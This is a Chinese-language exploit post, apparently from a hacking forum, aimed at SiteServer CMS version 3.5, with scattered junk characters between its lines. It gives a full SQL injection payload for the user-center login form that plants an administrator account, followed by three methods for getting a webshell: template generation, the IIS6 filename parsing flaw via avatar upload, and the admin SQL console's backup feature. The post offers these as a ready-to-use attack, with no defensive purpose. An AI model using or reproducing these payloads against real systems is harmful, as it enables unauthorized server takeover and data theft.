经测试秒杀最新的3.5版4 C3 k# w- A3 L, _$ H1 X, E2 a
stieserver官网:www.siteserver.cn
% H9 q& D" d% AEXP:' v2 m+ l1 Z; ^/ x
直接访问UserCenter/login.aspx: q) l9 P5 Q% {, b }8 v/ \1 j
用户名处输入:
) g4 c; n5 x; f5 F& Q. a! G3 b+ A/ B$ \( X& D
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–" d8 B* l$ D! x% K5 ^% }) u
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
& `- A t$ f- H之后再访问后台SiteServer/login.aspx用插入的用户登陆6 g. v$ N) `- K$ { u5 _
后台拿webshell的三种方法: H/ a- Q, L$ Y7 n8 Y9 y0 e- o6 `
一、0 E( ^9 Q( A9 t5 R% J1 B2 h
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
6 S! H! g# |! D9 w二、
( T1 B( F R$ N: Z8 A成员权限-》添加用户-》用户名为:1.asp
9 _# Y8 j B. m1 P j+ thttp://127.0.0.1/usercenter/ Z+ R* Q" v( n7 V8 M0 q1 b
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
' b* _, B$ Z1 e% \(ps:后台添加用户时不会验证是否含有非法字符)' g; ]: R& y# u& ?
三、
( D& P$ g+ I" \# r系统工具-》实用工具-》机器参数查看
/ l* S3 l( l. X1 o" o可以看到数据库类型、名称,WEB路径
) E" t6 }9 Y9 J7 j系统工具-》数据库工具-》SQL语句查询
2 C; A1 K% P! S ?这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |